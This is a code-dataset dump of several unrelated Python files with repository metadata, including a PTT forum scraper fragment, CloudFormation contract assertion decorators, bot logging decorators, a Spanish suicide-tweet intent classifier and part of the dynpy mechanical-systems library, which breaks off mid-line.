'[\\/:*?\"<>|]':\n new_article_text = new_article_text.replace(iw, '_')\n with open(\n r'%s/%s.txt' % (resource_path, new_article_text),\n 'w',\n encoding='utf-8',\n ) as w:\n w.write(article_content)\n print()\n except FileNotFoundError as e:\n print('==========')\n print(article_url)\n print(e.args)\n print('==========')\n except OSError as e:\n print('==========')\n print(article_url)\n print(e.args)\n print('==========')\n\n except AttributeError as e:\n print('==========')\n print(each_article)\n print(e.args)\n print('==========')\n\n url = (\n 'https://www.ptt.cc'\n + soup.select('div[class=\"btn-group btn-group-paging\"]')[0].select('a')[1][\n 'href'\n ]\n )\n", "repo_name": "uuboyscy/course-PyETL", "sub_path": "part02_pttArticleWithCookie/05_pttGossipingWithCookies.py", "file_name": "05_pttGossipingWithCookies.py", "file_ext": "py", "file_size_in_byte": 3483, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.path.exists", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 7, "usage_type": "call"}, {"api_name": "requests.session", "line_number": 12, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 20, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 31, "usage_type": "call"}]}
+{"seq_id": "23036012057", "text": "from functools import wraps\nfrom inspect import Parameter, signature\n\nimport pytest\n\nfrom rpdk.core.contract.interface import HandlerErrorCode\n\n\ndef _rebind(decorator, func, *args, **kwargs):\n \"\"\"Helper function to construct decorated arguments\n\n This works only with positional and likely positional arguments\n strongly keyword arguments are in **kwargs. It constructs kwargs'\n from positional values\n \"\"\"\n parameters = signature(func).parameters.values()\n decorated_parameters = set(signature(decorator).parameters.keys())\n\n positional_kwargs = dict(\n zip(\n [\n parameter.name\n for parameter in parameters\n if parameter.kind\n in (Parameter.POSITIONAL_ONLY, Parameter.POSITIONAL_OR_KEYWORD)\n and parameter.name not in kwargs\n ],\n args,\n )\n )\n return {k: kwargs.get(k) or positional_kwargs[k] for k in decorated_parameters}\n\n\ndef decorate(after=True):\n \"\"\"Helper function to construct decorator from a simple function\n\n arg: after means that decorated check should be run after the\n target function\n\n This is a 'decorate' meta function that wraps new decorator around\n target function and merges decorated arguments with target arguments\n convention: each new decorator should have a 'response' argument,\n which is an output of a target function\n \"\"\"\n\n def inner_decorator(decorator: object):\n def new_decorator(func: object):\n @wraps(func)\n def function(*args, **kwargs):\n response_arg = {}\n if after: # running function before the decorated check\n response = func(*args, **kwargs) # calling target function\n response_arg = {\"response\": response}\n\n kvargs = _rebind(decorator, func, *args, **{**kwargs, **response_arg})\n decorated_sig = signature(decorator)\n bound_arguments = decorated_sig.bind(**kvargs)\n decorator(\n *bound_arguments.args, **bound_arguments.kwargs\n ) # calling a decorated function to execute check\n\n # this allows to make a pre-execution check\n # e.g. if skip function\n if not after: # running function after the decorated check\n response = func(*args, **kwargs) # calling target function\n return response\n\n return function\n\n return new_decorator\n\n return inner_decorator\n\n\n@decorate()\ndef response_does_not_contain_write_only_properties(resource_client, response):\n resource_client.assert_write_only_property_does_not_exist(response[\"resourceModel\"])\n\n\n@decorate()\ndef response_contains_resource_model_equal_updated_model(\n response, current_resource_model, update_resource_model\n):\n assert response[\"resourceModel\"] == {\n **current_resource_model,\n **update_resource_model,\n }, \"All properties specified in the update request MUST be present in the \\\n model returned, and they MUST match exactly, with the exception of \\\n properties defined as writeOnlyProperties in the resource schema\"\n\n\n@decorate()\ndef response_contains_primary_identifier(resource_client, response):\n resource_client.assert_primary_identifier(\n resource_client.primary_identifier_paths, response[\"resourceModel\"]\n )\n\n\n@decorate()\ndef response_contains_unchanged_primary_identifier(\n resource_client, response, current_resource_model\n):\n assert resource_client.is_primary_identifier_equal(\n resource_client.primary_identifier_paths,\n current_resource_model,\n response[\"resourceModel\"],\n ), \"PrimaryIdentifier returned in every progress event must match \\\n the primaryIdentifier passed into the request\"\n\n\n@decorate(after=False)\ndef skip_not_writable_identifier(resource_client):\n if not resource_client.has_only_writable_identifiers():\n pytest.skip(\"No writable identifiers. Skipping test.\")\n\n\ndef failed_event(error_code, msg=\"\"):\n def decorator_wrapper(func: object):\n @wraps(func)\n def wrapper(*args, **kwargs):\n response_error = func(*args, **kwargs)\n if response_error is not None:\n if isinstance(error_code, HandlerErrorCode):\n error_code_tuple = (error_code,)\n assert response_error in error_code_tuple, msg\n return response_error\n\n return wrapper\n\n return decorator_wrapper\n", "repo_name": "inyamkacg/cloudformation-CLI", "sub_path": "src/rpdk/core/contract/suite/contract_asserts.py", "file_name": "contract_asserts.py", "file_ext": "py", "file_size_in_byte": 4562, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "inspect.signature", "line_number": 16, "usage_type": "call"}, {"api_name": "inspect.signature", "line_number": 17, "usage_type": "call"}, {"api_name": "inspect.Parameter.POSITIONAL_ONLY", "line_number": 25, "usage_type": "attribute"}, {"api_name": "inspect.Parameter", "line_number": 25, "usage_type": "name"}, {"api_name": "inspect.Parameter.POSITIONAL_OR_KEYWORD", "line_number": 25, "usage_type": "attribute"}, {"api_name": "inspect.signature", "line_number": 56, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 48, "usage_type": "call"}, {"api_name": "pytest.skip", "line_number": 114, "usage_type": "call"}, {"api_name": "rpdk.core.contract.interface.HandlerErrorCode", "line_number": 123, "usage_type": "argument"}, {"api_name": "functools.wraps", "line_number": 119, "usage_type": "call"}]}
+{"seq_id": "38019597285", "text": "import logging\nfrom datetime import datetime\n\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n\nclass log:\n def __init__(self, f):\n self.f = f\n self.logger = logging.getLogger(f.__module__)\n\n def __call__(self, *args):\n self.logger.info(\n 'chat_id:[{}] user_name:[{}] enters:[{}]'.format(args[0].effective_chat.id, args[0].effective_user.username,\n self.f.__name__))\n return self.f(*args)\n\n\nclass logInline:\n def __init__(self, f):\n self._f = f\n\n def __call__(self, *args):\n chat_id = args[0].effective_chat.id\n chat_message = args[0].effective_message.text\n msg = \"chat_id: {} || function: {} || message: {}\".format(chat_id, self._f.__name__, chat_message)\n print(\"{} : {}\".format(datetime.today(), msg))\n return self._f(*args)\n", "repo_name": "itchybumDev/buffolio-bot", "sub_path": "logging_handler.py", "file_name": "logging_handler.py", "file_ext": "py", "file_size_in_byte": 957, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "logging.basicConfig", "line_number": 4, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 4, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 28, "usage_type": "name"}]}
+{"seq_id": "29864076804", "text": "import numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import LinearSVC\nfrom sklearn.datasets import make_classification\nfrom sklearn.metrics import classification_report, confusion_matrix\nimport pandas as pd\nfrom sklearn.linear_model import LogisticRegression\nfrom joblib import dump, load\nfrom gensim.models import KeyedVectors #borrar prueba\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import cross_val_predict\n\nfrom vectorizer_data import get_vector_tfidf, create_tf_idf, w2v_vec, words_to_vec\n\n\n# DIMENCION VECTOR\ndim_vec=100\n\n#kidssas\npath_save_movel=\"./modelo/\" #Directorio donde se guardan los modelos entranados\nurl_data_csv='./modelo/suicidio_notacion.csv'\nurl_sw='./modelo/stopwords.txt'\n\n#Stopwords\nf = open(url_sw) # Open file on read mode\nstopwords = f.read().split(\"\\n\") # Create a list containing all lines\nf.close() # Close file\n#stopwords= open(url_sw).readlines()\n#print(stopwords)\n# Elimina stopwords \ndef delete_sw(frase):\n\tsin=[word for word in frase.split() if word not in stopwords]\n\t#print('Stopwords')\n\tif len(sin)==0:\n\t\treturn frase\n\telse:\n \t\treturn ' '.join(sin)\n\n\n# Lee el archivo csv y carga las listas que seran usadas.\ndef load_data(data_csv=url_data_csv):\n\tdata_g = pd.read_csv(data_csv) # Convierte csv en formato pandas\n\tfrase_sw=[]\n\tfor i in list(data_g.tweet_clean):\n\t\tfrase_sw.append(delete_sw(i))\n\treturn frase_sw, list(data_g.suicidio)\n\n\n# Retorna un dataframe con la data seleccionada\ndef get_random_data():\n\ttexto, clase = load_data(url_data_csv)\n\t#print(texto) \n\tdata_select = pd.DataFrame({'text': texto,'clase': clase})\n\tprint(data_select.shape)\n\tbalanced = data_select.groupby('clase').apply(sampling_k_elements).reset_index(drop=True)\n\treturn balanced\n\n# Toma 'k' datos random del dataset\ndef sampling_k_elements(group, k=500): \n if len(group) < k:\n return group\n return group.sample(k)\n\n\n# Separa los datos, para el entrenamiento y las pruebas\ndef split_data(vectores, clases): \n\t# tipo_vec='tf-idf', 'w2v'\n\t#print('vec',len(vectores),len(list(balanced['text'])))\n\tX_train, X_test, y_train, y_test = train_test_split(vectores, clases, test_size=0.2, random_state=42)\n\treturn X_train, X_test, y_train, y_test\n\ndef split_data2(frases, clases): \n\tk_train, k_test, l_train, l_test = train_test_split(frases, clases, test_size=0.2, random_state=42)\n\tfor i,j in zip(k_test,l_test):\n\t\tprint(j,i)\n\t\n\n# Clasificador Suport Vector Machine sin Kernel\ndef SVM(X_train, X_test, y_train, y_test,tipo_vec): \n\t#X_train, X_test, y_train, y_test=split_data(tipo_vec)\n\tclf = LinearSVC(random_state=0, tol=1e-5)\n\tclf.fit(X_train, y_train) \n\tLinearSVC(C=1.0, class_weight=None, dual=True, fit_intercept=True,\n\t intercept_scaling=1, loss='squared_hinge', max_iter=1000,\n\t multi_class='ovr', penalty='l2', random_state=0, tol=1e-05, verbose=0)\n\t#scores = cross_val_score(clf, X_train, y_train, cv=5)\n\t#print(\"Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n\tpred = clf.predict(X_test)\n\tprint(tipo_vec+'_SVM',' Accuracy: ' +str(clf.score(X_test, y_test)))\n\n\tprint(confusion_matrix(pred, y_test))\n\tprint(classification_report(pred, y_test))\n\tdump(clf, path_save_movel+tipo_vec+'_SVM.joblib')\n\n\n# Clasificador Regresion Logistica (distribucion de probabilidades)\ndef RL(X_train, X_test, y_train, y_test, tipo_vec):\n\t#X_train, X_test, y_train, y_test=split_data(tipo_vec)\n\tprint(tipo_vec+'_RL')\n\tclf = LogisticRegression(random_state=0, solver='lbfgs', multi_class='multinomial').fit(X_train, y_train)\n\t#y_pre = cross_val_predict(clf, X_train, y_train, cv=5)\n\t#print(classification_report(y_train, y_pre))\n\t#scores = cross_val_score(clf, X_train, y_train, cv=5)\n\t#print(\"Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n\tpred = clf.predict(X_test)\n\tprint(tipo_vec+'_RL',' Accuracy: ' +str(clf.score(X_test, y_test)))\n\tprint(confusion_matrix(pred, y_test))\n\tprint(classification_report(pred, y_test))\n\tdump(clf, path_save_movel+tipo_vec+'_RL.joblib')\n\n\n# Carga el modelo del clasificador\ndef load_classifier(tipo_model):\n\tif tipo_model=='tf-idf':\n\t\treturn load(path_save_movel+'tf-idf_RL.joblib') \n\telif tipo_model=='w2v':\n\t\treturn load(path_save_movel+'w2v_RL.joblib') \n\telse:\n\t\treturn 'Seleccione tipo de modelo'\n\n\n# Retorna una intencion de la frase, para respuesta del bot\ndef get_intent(frase,tipo_model='w2v',modelo_w2v=None):\n\t\n\tv=np.array([0]*dim_vec)#E\n\tmodelo_cl=load_classifier(tipo_model)\n\tif tipo_model=='w2v':\n\t\tfrase_vec=words_to_vec(frase,modelo_w2v)\n\t\treturn 4 if (frase_vec==v).all() else modelo_cl.predict(frase_vec.reshape(1,-1))[0]#E\n\telse:\n\t\treturn modelo_cl.predict(get_vector_tfidf(frase))[0]\n\n# Retorna una intencion de la frase para respuesta del bot, junto con la distribucion de probabilidades de pertenecer a una clase\ndef get_intent_prob(frase,tipo_model='w2v',modelo_w2v=None):\n\t\n\tmodelo_cl=load_classifier(tipo_model)\n\tif tipo_model=='w2v':\n\t\tv=np.array([0]*dim_vec) # DIMENCION\n\t\tfrase_vec, words_nw2v=words_to_vec(frase,modelo_w2v)\n\t\tprop=modelo_cl.predict_proba(frase_vec.reshape(1,-1))[0]\n\t\tdis_prob=[round(x*100,1) for x in prop]\n\t\treturn ([], words_nw2v) if (frase_vec==v).all() else (dis_prob, words_nw2v)\n\telse:\n\t\tfrase_vec, words_ntf=get_vector_tfidf(frase)# retorna el unico vector\n\t\tprint('SHAPE TF-IDF',frase_vec.shape)\n\t\tfrase_vec=frase_vec[0].reshape(1,-1)\n\t\tl,d=frase_vec.shape\n\t\tv=np.array([0]*d)\n\t\tprop=modelo_cl.predict_proba(frase_vec)[0]\n\t\tdis_prob=[round(x*100,1) for x in prop]\n\t\treturn ([], words_ntf) if (frase_vec==v).all() else (dis_prob, words_ntf)\n\n\n# Entrena modelos de clasificacion con los mismos datos\ndef training_models(model_w2v):\n\t#path_w2v=\"/root/w2v/SBW-vectors-300-min5.bin\" \n\tbalanced=get_random_data()#random y seleccion 'x' datos de cada clase\n\tvectores=[]\n\tvectores_tf=create_tf_idf(list(balanced['text']))\n\tvec_words=w2v_vec(list(balanced['text']),model_w2v)\n\t#test\n\tsplit_data2(list(balanced['text']), list(balanced['clase']))\n\tvectores_w2v=[a[0] for a in vec_words]\n\tX_train, X_test, y_train, y_test=split_data(vectores_tf, list(balanced['clase']))\n\tX_train2, X_test2, y_train2, y_test2=split_data(vectores_w2v, list(balanced['clase']))\n\tprint('Entrenando Modelos...')\n\tSVM(X_train, X_test, y_train, y_test,'tf-idf')\n\tRL(X_train, X_test, y_train, y_test,'tf-idf')\n\tSVM(X_train2, X_test2, y_train2, y_test2,'w2v')\n\tRL(X_train2, X_test2, y_train2, y_test2,'w2v')\n\nif __name__== \"__main__\":\n\ttraining_models()\n\t#chat()\n", "repo_name": "kvvaldez/spanish_suicide", "sub_path": "Code/intent_classification.py", "file_name": "intent_classification.py", "file_ext": "py", "file_size_in_byte": 6452, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pandas.read_csv", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 53, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 69, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 73, "usage_type": "call"}, {"api_name": "sklearn.svm.LinearSVC", "line_number": 81, "usage_type": "call"}, {"api_name": "sklearn.svm.LinearSVC", "line_number": 83, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 91, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 92, "usage_type": "call"}, {"api_name": "joblib.dump", "line_number": 93, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 100, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 107, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 108, "usage_type": "call"}, {"api_name": "joblib.dump", "line_number": 109, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 115, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 125, "usage_type": "call"}, {"api_name": "vectorizer_data.words_to_vec", "line_number": 128, "usage_type": "call"}, {"api_name": "vectorizer_data.get_vector_tfidf", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 138, "usage_type": "call"}, {"api_name": "vectorizer_data.words_to_vec", "line_number": 139, "usage_type": "call"}, {"api_name": "vectorizer_data.get_vector_tfidf", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 148, "usage_type": "call"}, {"api_name": "vectorizer_data.create_tf_idf", "line_number": 159, "usage_type": "call"}, {"api_name": "vectorizer_data.w2v_vec", "line_number": 160, "usage_type": "call"}]}
+{"seq_id": "32202633600", "text": "\"\"\"\nWrite a function that takes directory path, a file extension and an optional tokenizer.\nIt will count lines in all files with that extension if there are no tokenizer.\nIf a the tokenizer is not none, it will count tokens.\n\n# For dir with two files from hw1.py:\n# >>> universal_file_counter(test_dir, \"txt\")\n# 6\n# >>> universal_file_counter(test_dir, \"txt\", str.split)\n# 6\n\n\"\"\"\nimport os\nfrom pathlib import Path\nfrom typing import Callable, Optional\n\n\ndef tokenizer_processing(line, tokenizer):\n if tokenizer is None:\n return 1\n else:\n if type(tokenizer) is list:\n return sum([len(line.split(entry[0])) for entry in tokenizer])\n else:\n return len(tokenizer(line))\n\n\ndef universal_file_counter(\n dir_path: Path, file_extension: str, tokenizer: Optional[Callable] = None\n) -> int:\n counter = 0\n for file in os.listdir(dir_path):\n file_path = os.path.join(dir_path, file)\n if file.endswith(file_extension):\n with open(file_path) as fh:\n for line in fh:\n counter += tokenizer_processing(line, tokenizer)\n return counter\n", "repo_name": "Nadya7n/epam_homework_2021", "sub_path": "homework9/hw3.py", "file_name": "hw3.py", "file_ext": "py", "file_size_in_byte": 1140, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pathlib.Path", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 29, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}]}
+{"seq_id": "15918710597", "text": "from sympy import (Symbol, symbols, Matrix, sin, cos, asin, diff, sqrt, S,\n diag, Eq, hessian, Function, flatten, Tuple, im, pi, latex,\n dsolve, solve, fraction, factorial, Subs, Number, oo, Abs,\n N, solveset)\n\nfrom sympy.physics.mechanics import dynamicsymbols, ReferenceFrame, Point\nfrom sympy.physics.vector import vpprint, vlatex\nfrom ...dynamics import LagrangesDynamicSystem, HarmonicOscillator, mech_comp\n\nfrom ..elements import MaterialPoint, Spring, GravitationalForce, Disk, RigidBody2D, Damper, PID, Excitation, Force, base_frame, base_origin\nfrom ...continuous import ContinuousSystem, PlaneStressProblem\n\n\n\nimport base64\nimport random\nimport IPython as IP\nimport numpy as np\nimport inspect\n\nimport matplotlib.pyplot as plt\nfrom functools import cached_property, lru_cache\n\n\nREPORT_COMPONENTS_LIST = [\n mech_comp.TitlePageComponent,\n mech_comp.SchemeComponent,\n mech_comp.ExemplaryPictureComponent,\n mech_comp.KineticEnergyComponent,\n mech_comp.KineticEnergyDynPyCodeComponent,\n mech_comp.KineticEnergySymPyCodeComponent,\n mech_comp.PotentialEnergyComponent,\n mech_comp.PotentialEnergyDynPyCodeComponent,\n mech_comp.PotentialEnergySymPyCodeComponent,\n mech_comp.LagrangianComponent,\n mech_comp.GoverningEquationComponent,\n mech_comp.GoverningEquationDynpyCodeComponent,\n mech_comp.GoverningEquationSympyCodeComponent,\n mech_comp.FundamentalMatrixComponent,\n mech_comp.GeneralSolutionComponent,\n mech_comp.GeneralSolutionDynpyCodeComponent,\n mech_comp.GeneralSolutionSympyCodeComponent,\n mech_comp.SteadySolutionComponent,\n mech_comp.FreeVibrationFrequencyComponent\n ]\n\ndef plots_no():\n num = 0\n while True:\n yield num\n num += 1\n\n\n\nclass ComposedSystem(HarmonicOscillator):\n \"\"\"Base class for all systems\n\n \"\"\"\n _case_no = plots_no()\n \n scheme_name = 'damped_car_new.PNG'\n real_name = 'car_real.jpg'\n detail_scheme_name = 'sruba_pasowana.png'\n detail_real_name = 'buick_regal_3800.jpg'\n _default_args = ()\n #_default_folder_path = \"./dynpy/models/images/\"\n _path = None\n\n z = dynamicsymbols('z')\n\n m0 = Symbol('m_0', positive=True)\n k0 = Symbol('k_0', positive=True)\n F0 = Symbol('F_0', positive=True)\n Omega0 = Symbol('Omega_0', positive=True)\n ivar=Symbol('t')\n\n \n # @classmethod\n # def _scheme(cls):\n\n # path = cls._default_folder_path + cls.scheme_name\n\n # return path\n\n # @classmethod\n # def _real_example(cls):\n # path = cls._default_folder_path + cls.real_name\n\n # return path\n\n @classmethod\n def _detail_real(cls):\n path = cls._default_folder_path + cls.detail_real_name\n\n return path\n\n @classmethod\n def _detail_scheme(cls):\n path = cls._default_folder_path + cls.detail_scheme_name\n\n return path\n\n def _init_from_components(self, *args, system=None, **kwargs):\n\n if system is None:\n composed_system = self._elements_sum\n else:\n composed_system = system\n\n #print('CS',composed_system._components)\n super(HarmonicOscillator,self).__init__(None, system=composed_system)\n\n #print('self',self._components)\n if self._components is None:\n comps = {}\n else:\n comps = self._components\n\n self._components = {**comps, **self.components}\n\n def __init__(self,\n Lagrangian=None,\n m0=None,\n qs=None,\n forcelist=None,\n bodies=None,\n frame=None,\n hol_coneqs=None,\n nonhol_coneqs=None,\n label=None,\n ivar=None,\n evaluate=True,\n system=None,\n **kwargs):\n\n if ivar is not None: self.ivar = ivar\n if m0 is not None: self.m0 = m0\n\n if qs is not None:\n self.qs = qs\n else:\n self.qs = [self.z]\n\n\n self._init_from_components(system=system, **kwargs)\n\n @property\n def components(self):\n\n components = {}\n\n self._material_point = MaterialPoint(Symbol('ItIsWrongCode '), self.qs[0],\n self.qs)('Material Point')\n components['_material_point'] = self._material_point\n\n self._label = 'System seems to be wrong - method components is not overload'\n \n return components\n\n @property\n def elements(self):\n\n return {**super().components, **self.components}\n\n @classmethod\n def preview(cls, example=False):\n if example:\n path = cls._real_example()\n\n elif example == 'detail_scheme_name':\n path = cls._detail_scheme()\n elif example == 'detail_real_name':\n path = cls._detail_real()\n else:\n path = cls._scheme()\n print(path)\n with open(f\"{path}\", \"rb\") as image_file:\n encoded_string = base64.b64encode(image_file.read())\n image_file.close()\n\n return IP.display.Image(base64.b64decode(encoded_string))\n\n def _components_default_data(self,formatter=None):\n \n if formatter is None:\n formatter = lambda obj: obj._all_default_data(formatter=formatter)\n \n data=[formatter(elem) for elem in self.elements.values()]\n\n \n return {key:value for elem in data for key, value in elem.items()} \n \n def _components_numerical_data(self):\n \n data=[elem._all_numerical_data() for elem in self.elements.values()]\n \n \n return {key:value for elem in data for key, value in elem.items()} \n \n def _all_default_data(self,formatter=None):\n \n \n \n return {**self._components_default_data(formatter=formatter),**self.get_default_data()} \n \n def _all_numerical_data(self):\n \n return {**self._components_numerical_data(),**self.get_numerical_data()} \n \n \n def get_default_data(self,formatter=None):\n return {}\n\n def get_numerical_data(self):\n return {}\n\n def _params_summary(self):\n \n query = lambda obj: {key:'Param comes from '+obj.__class__.__name__ for key in obj._all_default_data().keys()}\n\n desc_dict={key:(val if isinstance(val,str) else 'Provided directly within class') for key,val in self._all_default_data( query ).items()}\n #desc_dict = self._all_default_data( query )\n\n return '\\n'.join([f'{key} - {value}' for key,value in desc_dict.items()])\n \n def _system_summary(self):\n \n\n\n return f'{self.system_description()}\\n {\"=\"*50} \\n {self._params_summary()}'\n \n def get_random_parameters(self):\n\n \n #print('preview for',self)\n #display(self._all_default_data())\n #display(self.get_default_data())\n \n default_data_dict = {**self._components_default_data(),**self.get_default_data()}\n\n if default_data_dict:\n parameters_dict = {\n key: random.choice(items_list)\n for key, items_list in default_data_dict.items()\n }\n else:\n parameters_dict = None\n\n return parameters_dict\n\n def get_numerical_parameters(self):\n\n default_data_dict = {**self._components_numerical_data(),**self.get_numerical_data()}\n\n if default_data_dict:\n parameters_dict = {\n key: random.choice(items_list)\n for key, items_list in default_data_dict.items()\n }\n else:\n parameters_dict = None\n\n return parameters_dict\n\n @property\n def _report_components(self):\n\n comp_list = [\n *REPORT_COMPONENTS_LIST\n ]\n\n return comp_list\n \n @lru_cache\n # def linearized(self,): #it was missing\n\n # return type(self).from_system(super().linearized())\n \n @lru_cache \n def linearized(self, x0=None, op_point=False, hint=[], label=None):\n\n #temporary workaround\n lin_sys = HarmonicOscillator(self).linearized(x0=x0,op_point=op_point,hint=hint,label=label)\n \n #old version\n #lin_sys=super().linearized(x0=x0,op_point=op_point,hint=hint,label=label)\n \n return type(self).from_system(lin_sys)\n\n def tensioner_belt_force(self):\n return self.k_tensioner * self.steady_solution()\n\n def left_belt_force(self):\n return self.k_belt * self.steady_solution()\n\n def right_belt_force(self):\n return self.k_belt * self.steady_solution()\n\n\n# def max_static_force_pin(self):\n# return abs(self.static_load().doit()[0])\n\n# def max_dynamic_force_pin(self):\n# return self.frequency_response_function() * self.stiffness_matrix(\n# )[0] + self.max_static_force_pin()\n\n def max_static_force_pin(self):\n return abs(self.static_load().doit()[0]) / 2\n\n def max_dynamic_force_pin(self):\n return self._frf()[0] * self.k_m + self.max_static_force_pin()\n\n def static_force_pin_diameter(self):\n kt = Symbol('k_t', positive=True)\n Re = Symbol('R_e', positive=True)\n return ((4 * self.max_static_force_pin()) / (pi * kt * Re))**(1 / 2)\n\n def dynamic_force_pin_diameter(self):\n kt = Symbol('k_t', positive=True)\n Re = Symbol('R_e', positive=True)\n return ((4 * self.max_dynamic_force_pin()) / (pi * kt * Re))**(1 / 2)\n Re = Symbol('R_e', positive=True)\n return ((4 * self.max_static_force_pin()) / (pi * kt * Re))**(1 / 2)\n\n def dynamic_force_pin_diameter(self):\n kt = Symbol('k_t', positive=True)\n Re = Symbol('R_e', positive=True)\n return ((4 * self.max_dynamic_force_pin()) / (pi * kt * Re))**(1 / 2)\n\n def _parameter_influence_analysis(self,parameter=None,param_span=None,dependencies_dict=None):\n\n from ...solvers.linear import ODESystem\n from ...utilities.adaptable import NumericalAnalysisDataFrame,TimeDataFrame,pd\n\n if parameter is None:\n parameter = self.system_parameters()[0]\n\n if param_span is None:\n param_span = [0.8,1,1.2]\n\n if dependencies_dict is None:\n dependencies_dict = {}\n\n reference_data = {**self.get_numerical_parameters()}\n display(reference_data)\n\n# eom = self._eoms[0]\n #system = ODESystem(odes=eom,dvars=self.q).as_first_ode_linear_system()\n #system = ODESystem(odes=eom,dvars=self.q,ode_order=2)#.numerized()\n system = self._ode_system\n \n \n \n Y = list(self.Y) + list(dependencies_dict.keys())\n\n index = pd.Index(np.linspace(0,100,1000),name=self.ivar)\n\n df_num = NumericalAnalysisDataFrame(index=index).from_model(system,\n parameter=parameter,\n span=param_span,\n reference_data=reference_data,\n coordinates=Y,\n index=index)\n\n results_num = df_num#.perform_simulations(model_level_name=0,dependencies=dependencies_dict)\n #results = TimeDataFrame(results_num).droplevel(0,axis=1)\n results= results_num\n \n return results\n \n def get_reference_data(self):\n \n return self.get_numerical_parameters()\n\n\nclass NonlinearComposedSystem(ComposedSystem):\n\n def frequency_response_function(self,\n frequency=Symbol('Omega', positive=True),\n amplitude=Symbol('a')):\n\n omega = (self.linearized()).natural_frequencies()[0]\n \n \n eps = self.small_parameter()\n\n exciting_force = self.external_forces()[0]\n\n comps = exciting_force.atoms(sin, cos)\n exciting_amp = sum([exciting_force.coeff(comp) for comp in comps])\n inertia = self.inertia_matrix()[0]\n\n return amplitude * (-frequency**2 + omega**2) * inertia + S(\n 3) / 4 * eps * amplitude**3 - exciting_amp\n\n def amplitude_from_frf(self, amplitude=Symbol('a')):\n\n return solveset(self.frequency_response_function(), amplitude)\n\n @property\n def _report_components(self):\n\n comp_list = [\n *REPORT_COMPONENTS_LIST\n ]\n\n return comp_list\n\n def max_static_force_pin(self):\n return abs(self.static_load().doit()[0]) / 2\n\n def max_dynamic_force_pin(self):\n lin_sys = ComposedSystem(self.linearized())\n #k_m = self._given_data[self.k_m]\n k_m = self.k_m\n # display(lin_sys.stiffness_matrix()[0])\n\n return lin_sys.frequency_response_function() * (\n lin_sys.stiffness_matrix()[0]) / 2 + self.max_static_force_pin()\n\n def max_dynamic_nonlinear_force_pin(self):\n lin_sys = ComposedSystem(self.linearized())\n\n amp = list(self.amplitude_from_frf())\n display(amp)\n #k_m = self._given_data[self.k_m]\n k_m = self.k_m\n\n return amp[0] * k_m + self.max_static_force_pin()\n \n \nclass SpringMassSystem(ComposedSystem):\n \"\"\"Ready to use sample Single Degree of Freedom System with mass on spring\n Arguments:\n =========\n m = Mass\n -Mass of system on spring\n\n k = Spring coefficient\n -Spring carrying the system\n\n ivar = symbol object\n -Independant time variable\n\n qs = dynamicsymbol object\n -Generalized coordinates\n\n Example\n =======\n A mass oscillating up and down while being held up by a spring with a spring constant k\n\n >>> t = symbols('t')\n >>> m, k = symbols('m, k')\n >>> qs = dynamicsymbols('z') # Generalized Coordinates\n >>> mass = SDoFHarmonicOscillator(m,k, qs=[z],) # Initialization of LagrangesDynamicSystem instance\n\n -We define the symbols and dynamicsymbols\n -Kinetic energy T and potential energy v are evaluated to calculate the lagrangian L\n -Reference frame was created with point P defining the position and the velocity determined on the z axis\n -external forces assigned\n -Next we determine the instance of the system using class LagrangeDynamicSystem\n -We call out the instance of the class\n -If necessary assign values for the default arguments\n\n\n \"\"\"\n scheme_name = 'engine.png'\n real_name = 'engine_real.PNG'\n\n m=Symbol('m', positive=True)\n k=Symbol('k', positive=True)\n ivar=Symbol('t')\n \n z=dynamicsymbols('z')\n \n def __init__(self,\n m=None,\n k=None,\n z=None,\n ivar=None,\n **kwargs):\n\n \n \n if m is not None: self.m = m\n if k is not None: self.k = k\n if ivar is not None: self.ivar = ivar\n if z is not None: self.z = z\n \n \n self.qs = [self.z]\n\n self._init_from_components(**kwargs)\n\n @property\n def components(self):\n\n components = {}\n \n self.material_point = MaterialPoint(self.m, self.z, qs=self.qs)\n self.spring = Spring(self.k, self.z, 